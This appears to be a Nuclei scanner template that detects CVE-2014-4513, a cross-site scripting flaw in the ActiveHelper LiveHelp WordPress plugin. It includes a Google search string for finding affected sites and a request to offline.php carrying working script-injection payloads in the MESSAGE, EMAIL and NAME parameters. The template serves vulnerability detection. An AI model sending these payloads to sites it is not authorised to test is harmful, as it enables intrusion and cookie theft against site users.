id: CVE-2014-4513 info: name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4513 - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 epss-percentile: 0.50288 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: activehelper product: activehelper_livehelp_live_chat framework: wordpress google-query: inurl:"/wp-content/plugins/activehelper-livehelp" tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'ActiveHelper LiveHelp Live Chat' - method: GET path: - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100c70973326dc4da5c4130c3180aa50e32ccedebe17dfc3e2135ce622c7d93307b022029ca8cebdadfded9c3a554c78cf22248ac02a412d228fa50c9063bc9be53c4bd:922c64590222798bb761d5b6d8e72950